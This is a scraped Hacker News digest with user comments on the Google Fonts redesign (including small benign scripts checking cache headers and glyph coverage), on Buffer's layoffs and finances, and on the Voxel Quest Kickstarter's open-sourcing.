It looks like Mad Libs to me, with all these little boxes in place of some of the letters. These appear to be little input boxes. You can grab and resize a box, but it snaps back; you can also type in a box, but what you type is quickly erased.

Super ridiculous.

15
stuaxo 2 days ago 2 replies      
Why are loads of the letters replaced by empty boxes? Is this a game show reference?

http://imgur.com/CY0yv4R

16
semi-extrinsic 3 days ago 0 replies      
Minor criticism: the characters preview is a bit of a mess. Two issues:

1) You're missing important non-ASCII characters which I know are in some of these fonts (such as Open Sans). These include German and Scandinavian characters like ä, ö, ü, ß, å, æ, ø (maybe more).

2) The ordering is non-standard and makes it hard to see what is actually there and not.

17
xaduha 3 days ago 1 reply      
Can someone explain to me why Google Fonts doesn't provide proper cache headers, still?

https://stackoverflow.com/questions/29091014/how-do-i-levera...

Why disallow caching? Unless I'm misunderstanding something.
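
The headers in question are easy to inspect directly; a small sketch using the requests library (the family queried is an arbitrary example):

  import requests  # pip install requests

  # Fetch the CSS that the @import URL would load, then dump cache headers.
  resp = requests.get("https://fonts.googleapis.com/css",
                      params={"family": "Open Sans"})
  for name in ("Cache-Control", "Expires", "Age"):
      print("{}: {}".format(name, resp.headers.get(name)))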

18
teuth 3 days ago 0 replies      
Really dislike the ng-click navigation for opening individual font pages. Those clickable elements should be anchors, to allow opening the pages in new tabs.

There doesn't seem to be any usability case for breaking a basic browsing convention here.

19
ibero 3 days ago 1 reply      
this is an update i didn't know i wanted. so many great little UX improvements to my workflow.

an interesting aside: they now have the ability to toggle the background (and font color). the presets are (black on white, white on black); interestingly, another preset is black on yellow. i didn't realize this was such a popular text/bg combination.

20
thomaspark 3 days ago 0 replies      
Lovely redesign that addresses usability complaints I had with the old version. In fact I built my own search tool for Google Fonts a few months back because of these issues:

http://fontcdn.org

Some of my critiques of the old version:

http://thomaspark.co/2015/08/a-better-way-to-search-google-f...

21
whizzkid 3 days ago 0 replies      
I just wondered why it is laggy when I scroll the page down quickly and inspected the network activity.

Six scrolls end up making 210 new requests. Really? Is this really needed, or couldn't it easily be improved with a bigger pagination size?

22
jeena 2 days ago 1 reply      
I have to wonder, is this some kind of a joke? https://jeena.net/s/google-fonts.png
23
franciscop 3 days ago 0 replies      
Isn't it counterintuitive that there are two scrollbars next to each other for smaller screens? And also that the one on the right scrolls the content on the left, while the one on the left scrolls the content on the right.

http://imgur.com/x9BMjmR

24
lossolo 3 days ago 0 replies      
Firefox on Ubuntu:

http://imgur.com/IpauSTs

25
gotchange 3 days ago 0 replies      
I congratulate the Google Fonts team! The redesign looks gorgeous and elegant in terms of UI and UX, but can I make a few suggestions?

1- Can you please add a double view button at the top to toggle between List and Grid views for maximum convenience?

2- At the risk of sounding a bit pedantic, some example sentences for the Arabic fonts don't look perfect.

For example, for the Amiri font, it's or more naturally and not [1]. For Lateef and without going over a lot of MSA grammatical rules, this is the more correct version of the example sentence . [2]

[1] The shades hid the moon.

[2] A recorded voice went off through a megaphone/speaker mounted above the door.

26
microcolonel 3 days ago 0 replies      
This is very frustrating; can't middle click to open a specimen in another window. I really hate this sort of website. They also seem to disable subpixel antialiasing on some of the transient buttons. I also don't like transient buttons to begin with.

Overall really not happy with most of this redesign. The specimen page is probably more informative though.

I get that OS X has bad subpixel rendering which shows painful fringing on coloured text, but FreeType handles it flawlessly, and I'm pretty sure ClearType does as well. There's no reason to disable subpixel rendering on these platforms.

27
buro9 2 days ago 0 replies      
I would love if they released the server logic that chose which file to include.

With http/2 I'd like to host the files so that they are served from the same origin, I'd also like to cache the CSS longer than a day.

At the moment I hit two domains (and I preconnect) to try and speed this up:

 <link rel="preconnect" href="https://fonts.googleapis.com">
 <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
Then in my CSS I import:

 @import url(https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,600|Merriweather:400,400italic,700italic,700);
That URL loads:

1. More fonts than I need.

2. Different font files depending on... useragent?

I'd prefer to self-host so that I could use http/2 server push for new sessions, and so that I could extend the caching.

The same origin via http/2 would accelerate all of the connections, and removing the need for the additional TLS connections to two Google properties would speed it up too.

These are about my only criticisms of Google fonts, that the little bit to make it really useful for those who want webfonts and performance is the bit that's hidden.
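
Point 2 above (user-agent-dependent responses) is easy to observe by fetching the same CSS URL with two different User-Agent strings; a sketch with the requests library (both UA strings are arbitrary examples):

  import requests  # pip install requests

  url = "https://fonts.googleapis.com/css?family=Merriweather"
  agents = {
      "older browser": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
      "newer browser": "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) "
                       "Gecko/20100101 Firefox/47.0",
  }
  for label, ua in agents.items():
      css = requests.get(url, headers={"User-Agent": ua}).text
      # Which font formats does the served CSS reference?
      formats = [f for f in ("woff2", "woff", "truetype", "embedded-opentype")
                 if "format('{}')".format(f) in css]
      print("{} -> {}".format(label, formats))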

28
barefootcoder 2 days ago 0 replies      
The page has an interesting bug with some special characters... it will initially accept a character, showing it in a different font, and then change it to an empty box. I tried a few, such as ™ (trademark) or ∞ (infinity), and they don't show up on the initial overview page, but if you click on the "see specimen" link you can type the same characters and see that the font does have them defined.
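
To check locally whether a given font file actually defines those glyphs, one option is the fontTools library; a minimal sketch (the file name is a placeholder):

  from fontTools.ttLib import TTFont  # pip install fonttools

  font = TTFont("OpenSans-Regular.ttf")  # placeholder: a downloaded font file
  cmap = font["cmap"].getBestCmap()      # maps codepoints to glyph names

  for ch in (u"\u2122", u"\u221e"):      # trademark sign, infinity
      status = "present" if ord(ch) in cmap else "missing"
      print("U+{:04X} {}".format(ord(ch), status))
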
29
ericmo 3 days ago 2 replies      
Very good, but it needs an option for resizing. I've tried looking at monospaced fonts and couldn't see them at a size at which a monospaced font would actually be used (the default is huge).
30
textmode 2 days ago 0 replies      
fonts.google*.com is similar to the Facebook "Like" button.

A Google effort to inject themselves into websites that may have nothing to do with Google, read by users who may not even use Google.

Users may be far from Google search engine page or any Google controlled subsidiary Blogger, etc., yet their Google-authored? browser is still connecting to Google.

These Google font domains are among the many useless and annoying domains I block.

I remember the days when another large company was pushing "Web fonts". They asked the user to "install" the fonts; there was no "font server" and no incessant phoning home.

Today that company forces 10GB+ downloads of their "updated" OS on users without unequivocal consent. The stories of systems crashing in Africa under the load and network admins puzzling over the effects of massive Windows Update traffic in Australia have been amusing.

Keep up the great work guys. Those "web fonts" are really amazing!

31
forrestthewoods 3 days ago 0 replies      
These all look really bad on my Win 10 + Chrome machine. It's like the ClearType settings aren't working right? Every font has a very fuzzy/blurry edge. Really weird. It's almost like it's rendering small and blowing it up, rather than rendering large and anti-aliasing.

Maybe something is wrong with my PC?

32
stolsvik 3 days ago 1 reply      
Are these free to use? Open and permissive license? That should be the first thing mentioned on the site.
33
chmike 2 days ago 1 reply      
What is wrong with this page? It looks awful with Firefox 47.0 on Ubuntu! [screen capture](http://imgur.com/hqc6jp2)
34
macandcheese 3 days ago 0 replies      
Beautiful redesign! Very cool functionality with the inline editor and contextually revealed selectors.

...but they prevent you from right-clicking to open fonts in a new tab. I can already click into a font by regularly clicking; did they need to override right-click functionality as well?

35
Ciantic 2 days ago 0 replies      
There are still two pages for a single font, one such as this:

https://www.google.com/fonts/specimen/Open+Sans

And now this:

https://fonts.google.com/specimen/Open+Sans?query=open+sans

The first one always comes up in search results and is nothing but a link to the real page. What gives? This is a terrible user experience; if I search for Google fonts, there shouldn't be multiple pages for the same font.

36
huntleydavis 3 days ago 0 replies      
Very impressive performance loading considering the number of fonts. Curious if they are just loading an incredibly stripped down version of each font for the preview and then lazy loading in the full font if you click to edit the text. Either way thumbs up.
37
keyle 2 days ago 0 replies      
It's definitely an upgrade compared to the old version, but the fact that it needs a "Try typing directly into the..." hint shows a shortcoming of their UX. I didn't know what it meant; it took me a few tries. I think it could be better. At the least, hovering over the fields should make it more obvious that they're editable.
38
tacone 3 days ago 1 reply      
Still, they don't offer any font+CSS download option the way Font Squirrel does. You have to do it by hand or be stuck with their CDN. How bad.
39
twhb 3 days ago 0 replies      
To the Google Fonts dev(s) in this thread: why Angular 1, not 2? Was the previous version already using Angular 1?
40
legulere 3 days ago 0 replies      
The sliders on the right side should also work (and activate the box to their left) when that box is deactivated.
41
adams_at 3 days ago 0 replies      
Long overdue and very nice! I would like to filter by OpenType features, though (e.g., serif font with oldstyle figures).
42
eyeareque 3 days ago 2 replies      
What is in it for google to give these fonts away? Does it help them track people or learn about sites that use them?
43
dpcan 3 days ago 0 replies      
I've been waiting since 1995 to have the same sort of tool built into Windows to view my installed fonts.
44
andyfleming 3 days ago 0 replies      
All these updates and still can't select a range for "thickness", "width", etc.
45
zanerino 3 days ago 0 replies      
I can't select 10 px font sizes with the slider on some fonts like "Space Mono." I can with others, and then can click the "Apply to all specimens" to update even the fonts I can't adjust with the slider control.

I'm using Firefox 47.0.

46
calewis 2 days ago 0 replies      
A "+" icon that has a hover state and an interaction, yet they do different things? Good work. Nice quotes are irrelevant if you can't get the basics of user experience right.
47
gregmac 3 days ago 0 replies      
Anyone else having trouble with this? Some characters not showing up. Chrome 51 on Windows 10: https://i.imgur.com/TTNQSOA.png
48
smpetrey 3 days ago 0 replies      
A wonderful update. A useful creation that celebrates type. High-fives are in order.
49
NKCSS 3 days ago 1 reply      
I wish you could filter fonts based on writing style; take the letter "a", for instance: there are so many ways to represent the lowercase form. To find complementary fonts, it would be nice to filter on those characteristics.
50
STRiDEX 3 days ago 0 replies      
Looks like angular 1 with angular material. Works very smoothly here. Neat.
51
Marazan 3 days ago 1 reply      
As a die hard lover of the eurostile inspired 'monofur' as my programming font Space Mono looks very, very interesting.
52
jenscow 3 days ago 0 replies      
Wow - I did not realise they had so many fonts!
53
huangc10 3 days ago 1 reply      
What's the font used on the page? It reads beautifully (especially in the "about") and I'd like to use it.
54
msoad 3 days ago 1 reply      
I thought Google Fonts has Farsi fonts as well.
55
Flimm 2 days ago 0 replies      
Being able to select a language for the sample text is very useful. Thanks Google!
56
alansmitheebk 3 days ago 0 replies      
Most of these look like shit in chrome.
57
avikalpa 3 days ago 0 replies      
Is it just me, or does the Google Fonts page look a lot like Microsoft's Metro design?
58
neves 3 days ago 0 replies      
Why should anyone buy fonts with so many high quality ones free to use?
59
hellok 3 days ago 0 replies      
\(o_o)/ Unfortunately, this page doesn't exist.
60
adrianlmm 3 days ago 0 replies      
61
honkhonkpants 3 days ago 2 replies      

Lazy loading while I scroll makes Chrome cry.

8
Buffer Layoffs buffer.com
567 points by aarondf  1 day ago   397 comments top 53
1
compiler-guy 1 day ago 24 replies      
This may be a little cynical but:

"With our culture of bringing our whole selves to work and seeing team as family, with shared values we live by,..."

In the American business world, you are an employee until you aren't. Confusing being an employee with being "family" is a mistake, both for the company and the employee.

When times get bad, companies do what it takes to survive, including throwing employees overboard. That's just a fact.

Buffer may have thought it was different, but that flow-chart of how they decided whom to lay off was entirely about how an employee can help the company, not how the layoff would affect the employee. That's not how normal families make decisions.

I have no problem with any of that, but anyone who thinks that way has another thing coming.

All of this isn't to say that Buffer was thoughtless or callous in how they handled it. From the outside, it looks like one of the better handled layoffs I've seen.

But still. Don't confuse your job with your family. It's a business relationship that is only maintained as long as it is in both side's interest to do so.

2
sulam 17 hours ago 4 replies      
Two things jumped out at me.

1) They planned to spend 1/3 of their remaining cash on flying people around the world to meet f2f. Whoah! They need a CFO with some real power, because that is absurd.

2) Speaking of needing a CFO, one of the first things a CFO will probably point out to them is that their cash target is off by 100%. They're targeting 50% of today's ARR sometime next year, yet they plan to double ARR in the next 12-18 months. If they truly want 50% of ARR on hand, they need to target $10M, not $4-5M.

I also have some questions about the graph -- I'm sure it's well-meaning but it looks fishy. The slope of the curve is noticeably better in the go-forward plan vs the status-quo plan, but there's no logic to support that in the post. I imagine there's a breakdown that makes this make sense, but it's not at all obvious, and the naive conclusion is that these people who were fired were actually slowing down sales somehow. Secondly, every time I see a graph where the next month is negative and then ... magic... and the slope goes positive, my spidey sense tingles pretty damn hard. That said, there are some obvious reasons this might happen, including the cost of the layoff being recognized next month, so that's less of an obvious red flag.
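
For what it's worth, the arithmetic behind point 2 above is easy to reproduce if you start from the ~$840K MRR figure cited elsewhere in this thread (the doubling is the plan's assumption, not a fact):

  mrr = 840000                        # approx., per Buffer's public dashboard
  arr_today = mrr * 12                # ~ $10.1M ARR
  arr_projected = arr_today * 2       # the stated 12-18 month doubling plan
  target_cash = 0.5 * arr_projected   # the "50% of ARR on hand" rule
  print("target cash: ${:,.0f}".format(target_cash))  # ~ $10M, not $4-5M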

3
hkmurakami 1 day ago 1 reply      
>In short, this was all caused by the fact that we grew the team too big, too fast. We thought we were being mindful about balancing the pace of our hiring with our revenue growth. We werent.

>Reflecting on it now, I see a lot of ego and pride reflected in that team size number.

> In many areas, we grew the team more than was truly necessary for the time, more than was clearly validated.

I feel like we all experience this pull from vanity metrics, ego, etc. The level of honesty we've seen in this post will hopefully serve as a reality check for many of us.

>Both Leo and I have taken a salary cut of 40% until at least the end of the year. Savings: $94,000.

>Leo and I are committing $100k each in the form of a loan at the lowest possible interest rate, with repayment only when Buffer reaches a healthy financial position. Savings: $200,000.

This is an attitude and decision I saw made by the C-level during the financial crisis at a company with hundreds of employees. The C-level took home $0 in pay and the staff took a 40% cut until they made it back to profitability, in order to avoid laying anyone off (this was in Japan, where reemployment would be incredibly difficult).

It shows maturity and commitment to the organization (i.e. your people) that is rarely seen these days in startup land. Much respect.

4
danso 1 day ago 6 replies      
FWIW, here's their public spreadsheet of salaries and calculations. Not sure if it's been recently updated (on closer look, seems to reflect the founders' stated pay cuts, and new hires as recent as last month):

https://docs.google.com/spreadsheets/d/1l3bXAv8JE5RB9siMq36-...

edit: Adding links to their blog posts:

https://open.buffer.com/transparent-salaries/

https://open.buffer.com/introducing-open-salaries-at-buffer-...

5
rwhitman 1 day ago 0 replies      
As much as I want to dive into armchair management here, I greatly respect the fact that the buffer folks remained committed to the total open transparency thing, even when it didn't paint the business in a positive light. That takes a lot of balls

In a world where business failures are rarely documented, people ought to celebrate the fact that these guys are giving the world a recorded history of the lifecycle of their company, their thoughts when making business decisions, etc. There is immense value to be gained here for anyone in this industry.

6
ctvo 1 day ago 4 replies      
>> We canceled our upcoming team retreat to Berlin. Savings: $400,000.

Compared to all their other costs, that one stood out the most: roughly $500k in savings from laying off 10% of your workforce, versus $400k for a team retreat in Berlin.

Is this typical?

7
minimaxir 1 day ago 8 replies      
While Buffer's transparency is incredible, the financial calculations in the article fail to account for the possibility of an employee-exodus domino effect, especially with employees both knowing the financial state of the company and seeing relevant perks cut.
8
hobo_mark 1 day ago 6 replies      
I certainly appreciate their openness, and like to follow their progress, but...

...could anyone explain to this naive commenter how it takes 90 (80 for that matter) people to run essentially a 'cronjob as a service' business?

9
odbol_ 10 hours ago 0 replies      
What is with capitalism's obsession with constant growth? Buffer is a great app, I use it every day, but how in the f*ck do they need 100 employees to maintain it?

My company is writing an entire smartwatch OS, including companion apps for iOS and Android, and we're less than 10 people. Buffer needs 100 people just to write one multiplatform app? What is going on here?

10
eropple 1 day ago 0 replies      
> Reflecting on it now, I see a lot of ego and pride reflected in that team size number.

This is one of the worst diseases I see in the tech world. I have friends who, when asked how their company is doing, respond with something like "great! We just hired a dozen more engineers."

I'm pretty sure a better answer is "great! We just got X customers," or "great! We're profitable now!". Not how big your fief is. (But, mentioning fiefs, I'm struck by the notion that a startup is just a business unit of a loosely-organized corporation and CxOs thereof just middle managers for an investor-class executive group.)

11
k-mcgrady 1 day ago 3 replies      
I'm curious as to why they had 94 employees. That seems like an insanely high number for a company that does something pretty basic (not dumping on the product, I like it and have used it in the past). What are all of those people doing?
12
joosters 1 day ago 1 reply      
"We had just come out of a long experiment with self-management, where we fully leaned in to ..."

What on earth does 'fully leaned in' mean? It's not the greatest of metaphors, I pictured someone falling on their face.

13
AndrewKemendo 1 day ago 0 replies      
They laid off 10 people, 11% of their workforce - which means they had ~90 employees.

Crunchbase tells me they have had almost 4M in investment since 2011 and Baremetrics puts them at 45M in lifetime revenues. So, call it a round $50M in capital.

50M/90 employees all in is around $135k/employee each year for the last two years. Subtract all the perks and those numbers get hard fast.

Just goes to show that, even with a lot of cash, a lot of people cost a lot. It ends up doing a disservice to each existing employee, with each new person your company brings on, if you can't scale revenue with the pace of hiring.

14
freestockoption 9 hours ago 0 replies      
"We had just come out of a long experiment with self-management"

Why do startups do these huge management experiments? My company did the flat thing too and they spent a few months trying to get people to understand it. Probably burning up 5hr/wk for each person. Until they almost ran out of money. By then people were really confused. I think it almost killed the company due to the politics and red tape it created (strange, it was supposed to eliminate it).

My opinion is that it's hard enough to run a startup, let alone trying to invent a new management methodology. Best to go with what people already know. It may not be perfect, but at least there's some prior experience with it.

Just like how most would advise using the programming language and platform you know to build your initial product, rather than trying to learn something that you think might be better.

15
pascalxus 10 hours ago 1 reply      
It sounds like they handled this layoff both compassionately and professionally, although the founders have a lot to learn about balancing their spending.

But still, every company and employee needs to recognize that your coworkers and company are not your family - this only leads to misplaced expectations.

One of the things that makes America so competitive is the concept of at-will employment - the company can fire or lay you off at any time, and you can leave at any time too. This is a reality we must accept for capitalism to work at optimum efficiency. I realize this may seem heartless and cruel, but that's why you need work/life balance. Ideally work should not account for more than 10 to 20 hours of your life per week. Sadly, for most of us it's 40+ hours. It is outside of "work" where you can form relationships that mirror a family-like structure - in volunteer groups (unpaid), friendship circles, hobby groups, book clubs, etc. More of our lives should be dedicated to such organizations for us to remain better balanced.

16
ryanmarsh 1 day ago 0 replies      
Company lays off 10,000 people: "restructuring"

This guy lays off 10: heart felt apologies and deep moment of reflection

Criticize away HN, while he still has his humanity.

17
byset 1 day ago 0 replies      
I guess I'm nitpicking, and the guy probably just needs an editor, but the whole tone of this post seemed tiresomely self-congratulatory to me. "Look at how frank and empathetic and open I am! Look at me ruthlessly dissect my own mistakes! Isn't that refreshing?"

It also all seems a bit maudlin: being laid off is a terrible thing, but mistakes happen and employees are aware of the risks going in (although, as others have noted, this type of situation underscores how inappropriate the whole "we're a big family" idea is). It would seem more respectful to the laid-off employees not to go on and on in this manner.

18
selectron 1 day ago 0 replies      
Good for them for being transparent even when the company is struggling, but if I were an employee at the company I would be worried. The chart they provide of Buffer's bank balance over time seems overly optimistic. It looks like they assume that the employees they fired added no value to the company - they assume the company will generate the same revenue even after cutting 10% of their employees. This is wrong, and it would worry me greatly that the founders don't seem to recognize it. Of course I would be worried anyway, because laying people off at a start-up is a really bad sign, any way you try to spin it.
19
pbreit 1 day ago 1 reply      
I have mixed emotions with Buffer's shtick. On the one hand there's something fresh and unique about it. On the other, I think: just put your heads down and get to work serving customers!

I'm guessing the main benefit of the open-ness is marketing. I doubt it helps the company much beyond that.

20
nickgrosvenor 1 day ago 0 replies      
Damn, only Buffer could exploit the firing of 10 percent of their staff with a promotional post.

I don't know whether to be impressed or offended.

21
nodesocket 1 day ago 0 replies      
This is a bit surprising. Buffer's revenue has been growing solidly (up 23% in the last 6 months), with around $840K in MRR. I suppose having that many employees adds up quickly though. It's hard letting people go... But ultimately you have to do what is required to keep the company going.

Source of financials:http://i.imgur.com/i3W5KC7.png

22
smuss77 1 day ago 1 reply      
I really like the transparency and accountability.

Two questions: Why are the two loans necessary? And, how does a loan get counted as savings?

> Leo and I are committing $100k each in the form of a loan at the lowest possible interest rate, with repayment only when Buffer reaches a healthy financial position. Savings: $200,000.

23
pc86 17 hours ago 0 replies      
From a tweet cited in the article (not the author):

> i think @dfjjosh's rule of 50% of ARR to operate and invest without $$$ stress is a really good one. use debt to hack it.

What's the point of taking on debt just to have more cash on hand? Is this a startup-y "growth über alles" type of mentality or is it found in the larger business world as well? I don't see how increasing your burn rate just to have more cash in the bank is a good business decision, especially when you'll pay a premium to have that cash in the form of interest or loan origination.

24
beat 1 day ago 0 replies      
This reminds me of Ben Horowitz' The Hard Thing About Hard Things, where he talked about implementing a plan to lay off 90% of his company in complete secrecy, for fear of employee exodus and loss of customer confidence. But that was a very different situation than Buffer is in now, as it happened during the original dot-com era collapse.

Kudos to Buffer for their approach to transparency. I think it will actually serve them well here.

25
OoTheNigerian 1 day ago 0 replies      
I appreciate the forthrightness in this blog post. Not only have they owned up to mistakes, the thought process in dealing with them (whether you agree with it or not) is well documented.

To be transparent is quite a difficult thing. You expose yourself to so much scrutiny.

Godspeed, Joel, as you and your team bounce back from this slight setback. We all fall; how we get up is what matters.

26
jimbokun 14 hours ago 1 reply      
On deciding to not raise funds from venture capitalists:

"This has some implications on the true growth rate we can expect, yet it has significant benefits we feel in terms of the freedom we have to experiment not only with innovation in products but also in the way we work."

I think this reflects an important, often over looked point. Many people want to start a business because they prefer to not have a boss, and be able to make their own decisions.

In many ways, raising capital from outsiders can just replace one boss with another. Now you have to make your investors happy, even when it leads to different decisions than what you might make otherwise.

27
AznHisoka 1 day ago 0 replies      
We always talk about third-party platform risk for startups, and to me Buffer is the prototypical example of it. If Twitter has a bad day, they can cut off their API access and they'd be dead (OK, they support Facebook and others, but that's still half of your core).

So it seemed quite absurd they'd spend so much on things like retreats when they have so much risk.

28
alexbrower 1 day ago 0 replies      
"Although I know rationally that the size of the team is not something to celebrate, I feel that I slipped into that harmful mindset quite a bit over the last year. Not everyone is familiar with growth metrics like monthly recurring revenue, but team size is easy to understand. Sometimes it impressed people when I told them how big the company was, and I was proud to share it."

Correct. Headcount is a figure that represents a company's means. If you're tracking it as an end result, you end up having to make hard decisions or someone makes them for you.

The transparency is commendable. A couple other observations:

- Affected employees had an average salary of $58.5k (assuming your metric is net of benefits and payroll tax). If this is annualized, it appears you let go of non-engineers. Set goals and performance expectations for those who remain, especially those who build your product.

- Stop publicly promising salary increases altogether. Promote people based on their ability, not an artificial loyalty policy. Some people deserve 10%+ raises, some you'll find are overpaid. Use a basic job ladder and put the burden on managers to justify comp changes.

- If the policy of granting vacation bonuses was for recruiting purposes, you've successfully attracted people who want to be paid not to work. Again, implement a corporate bonus program and set goals for staff.

Best of luck.

29
jmcgough 1 day ago 0 replies      
Appreciate the transparency, but they mention that they let people go on a "last in, first out" basis, and their flowchart seems to suggest that if they like an employee they'll move them to another role.

I don't blame them for doing housekeeping in that way - if you need to reduce headcount, start with people who don't fit the culture and business needs - but they shouldn't pretend that it's perfectly unbiased.

30
galistoca 1 day ago 0 replies      
People keep saying "admire the transparency", "appreciate the transparency", but really what's the point? Who is the "transparency" for?

I really couldn't care less about my salary being made public to the world, all I care about is working on something I believe in.

Extreme transparency has nothing to do with their business growth and it will probably come back to haunt them later, I don't know why they're going so far as to do all this.

Doing business is extremely hard on its own; why complicate matters and expose private details to the public, which can and probably will at some point be used against you? I mean, even on this thread people nitpick and gossip about every single detail. And it would be a lie to say they care 0% about these things. If they do care, it just means less time worrying about their core business.

31
kra34 6 hours ago 0 replies      
"when we had to tell 10 talented teammates that their journey with us was over" - Gavin Belson
32
kumarski 1 day ago 0 replies      
They have some pretty tough competition now.

https://www.socialchamp.io/ for example is one that is growing rapidly.

I can only imagine that it may become a commoditized space w/ little differentiation.

33
chx 1 day ago 2 replies      
Why is this several-hundred-upvote news? A startup grows from 30-something to 90-something, finds it's too much, and trims a little. That's entirely normal. What's the big news?
34
OliverJones 1 day ago 1 reply      
> Leo and I are committing $100k each in the form of a loan at the lowest possible interest rate, with repayment only when Buffer reaches a healthy financial position. Savings: $200,000.

Oops. This isn't savings. It's high-priority debt. Investors really want to invest in the future of the company, not the past. If these guys want to serve their company, they'll

(a) write this off their personal books, considering it an unrecoverable cost.

(b) convert it from debt to some kind of warrant giving them the right to recover it from profits at some point in the future.

Who's advising these guys?

35
WWKong 1 day ago 0 replies      
"... seeing team as family, with shared values..."

Should have tried a pay cut across the board and seen if folks jumped ship. A good test to see if that culture held up.

(Just a thought. I know it is more nuanced)

36
Yabood 1 day ago 0 replies      
It boggles my mind why a company like Buffer, which has a relatively simple product and a pretty straightforward transactional sales model, would ever need that many people.
37
tdaltonc 12 hours ago 0 replies      
Have they written about their experience with Holacracy?
38
mattfrommars 20 hours ago 0 replies      
Interesting, as just yesterday I was praising the company for how successful it is in this niche, on a thread that went something like "Successful companies which YC rejected".

And here are the layoffs. Upper management were banking $250,000 the last time I read their details.

39
ovrdrv3 1 day ago 3 replies      
What does buffer do as a company?
40
adwf 1 day ago 0 replies      
Ouch. Never a pleasant thing to do.

I just hope they made the cut deep enough. A common mistake is to cut enough to just get back to break even, when what you really need in that situation is to get back to a decent level of profitability. The number of times I've seen a second round of layoffs because people got that wrong...

From the looks of their projections, they've done the right thing, back to profitability and growth.

41
OJFord 20 hours ago 0 replies      
I realise it's a significant (11%) proportion of their (former) staff - but "we've made 10 layoffs" sounds incredibly personal.
42
dmitrygr 1 day ago 3 replies      
"We made 10 layoffs in order to recover to a healthier financial position. Savings: $585,000"

so these people cost the company $58,500 apiece (this is incl. their benefits, insurance, etc). Meaning their salaries were, what? $40k?

wow?
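
Working that backwards under an assumed fully-loaded cost multiplier of 1.3-1.4x on base salary (the multiplier is an assumption, and Buffer's figure may be prorated rather than annual):

  savings = 585000   # stated savings from the post
  headcount = 10
  fully_loaded = savings / headcount   # $58,500 per person, all-in
  for multiplier in (1.3, 1.4):        # assumed overhead multipliers
      base = fully_loaded / multiplier
      print("x{}: base salary ~ ${:,.0f}".format(multiplier, base))
  # -> roughly $42k-$45k, consistent with the ~$40k guess above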

43
Fiahil 1 day ago 0 replies      
Are we seeing these events more frequently than before, or is it just a matter of perception?

Anyway, despite being a tough time for them; it's good to know they live in reality and not in a "unicorn-themed-chase-party".

44
hathym 16 hours ago 1 reply      
22% of their staff are happiness heroes [0] !!! WTF !!!!!!

[0] https://docs.google.com/spreadsheets/d/1l3bXAv8JE5RB9siMq36-...

45
cpg 1 day ago 0 replies      
Buffer overflow. Oops!
46
rigotovar 12 hours ago 1 reply      
I'm sorry if I haven't read all the comments, but this post basically tells me that the company should remove both founders and have a real CEO making the right decisions from the beginning of the growth. 34 to 94 is nearly three times the size, and retreats and perks like those mentioned are not worth it, especially for such a small/young company.
47
sinzone 1 day ago 0 replies      
Leadership has to stay under one roof. The team can be distributed, but not the leadership. Everyone in the mother tipi.
48
markbao 1 day ago 0 replies      
For a revenue-generating business like this, is 90 employees with $10M ARR normal?

Admire the transparency.

49
the_watcher 1 day ago 0 replies      
The comments so far all seem focused on the language Joel uses (family, etc). While that may be fair, if you simply change those terms into whatever you think is more accurate, this is a very, very good piece of insight into the perils of growing too quickly, as well as an (as usual) extremely transparent look into how a company that is reasonably successful adapts.
50
zump 22 hours ago 0 replies      
What does this company even do?!
51
reality_czech 1 day ago 0 replies      
In Silicon Valley, Buffer overflows you!
52
alphacome 1 day ago 0 replies      
Layoff is: to get rid of someone as soon as he has finished his work
53
GBond 1 day ago 1 reply      
OT: I stopped using Buffer since they've imposed limits on the free accounts. Any suggestions for alternatives?
9
Another Update voxelquest.com
602 points by shawndumas  3 days ago   113 comments top 28
1
danso 3 days ago 2 replies      
It's rare to see a Kickstarter project essentially "fail" in delivering the original product but have so many backers feeling satisfied [1]... it's a testament to the creator's consistently thorough and engaging updates that backers were happy just to be on the journey, even if they didn't get the game they were promised. Also, it appears that the estimated delivery was Jan. 2017... there's probably a positive psychological component to being honest early rather than dragging people through a long period of denial and delay before going radio silent.

[1] https://www.kickstarter.com/projects/gavan/voxel-quest/posts...

2
phantom_oracle 2 days ago 1 reply      
When you see people say things like:

"I backed you, not the product, keep the money!"

OR

"Open Sourcing it is worth more than I ever backed for this project, refund not needed"

AND (the best of them all - the way the internet does compliments):

"I will spend however much time is required to hunt you down in person and forcefully give you the money back if you dare refund me."

You're reminded of how little the things we own or build matter compared to the bonds we develop.

Maybe 10 years from now, through a community-led project, your game (with you as 1 of the leaders of the project) becomes a reality.

The game then takes off and is played by the same community who built it. You end up making about 90 good friends who you game/hack/build the game with and become a small internet celebrity to niche-gamers.

Although this story is not on the "high-tech, Docker-swarm-graphDB-containerManager-C++killer-version0.0.1234.44444" level, seeing a story like this reminds us of our humanity, even as people who rot away behind screens all day :)

3
shazow 3 days ago 1 reply      
As a Kickstarter backer, MIT licensed code very much exceeds my expectations. Thank you!

I'd love to get a playable game out of this someday, but it doesn't have to come from you. :)

Best of luck, OpenAI is lucky to have you.

4
grownseed 3 days ago 1 reply      
Worth a shot, I know there are some people around here who don't know what to do with their money, who might be considering financing the next chat/social/... app, but I implore you to consider supporting Gavan full-time (should he actually want it of course). I absolutely would if I could, unfortunately public cancer research is not exactly a lucrative business...

Voxel Quest is a great project that deserves all the attention it can get. It might not be the next unicorn, hell, it might not even produce any ROI, but as I see it, it has the potential to have a great impact. See it as a goodwill project if you will, a chance to make a nice dent in the gaming landscape and more.

It's not often that I feel this way, but some things just deserve to exist and be worked on for their own sake. Voxel Quest is one of these things, and Gavan is the one who can make it happen.

5
Volundr 3 days ago 1 reply      
If I'd known the end result of this would be an open source game engine, I'd have given you more money. Take it! Keep it!
6
qopp 3 days ago 1 reply      
I'm happy that Gavan is Open Sourcing his work and that people are generally happy with the outcome.

That being said I would not be surprised if Gavan announced a brand new voxel project and kickstarter a few years from now, starting from scratch like last time.

Previous discussion: https://news.ycombinator.com/item?id=7491456

7
zubspace 2 days ago 2 replies      
Is there something you would do differently, if you could go back in time?

Like many developers around here I got into programming through game development. Back in the day I started working on my own game engine and put a lot of effort into it without going anywhere. I spent about 8 years working on it on and off and learned a ton of C++. I believe it was time well spent, but sometimes I get the nagging doubt that I should have spent my time more wisely.

Times change. Family, 2 kids, a house. I had to optimize the way I spend my time. In the late hours I had left, I started dabbling in other engines and frameworks for 3D games: Three.js, Dart, Haxe (Flambe, HaxeFlixel, HaxePunk), and now I've finally settled on Unity.

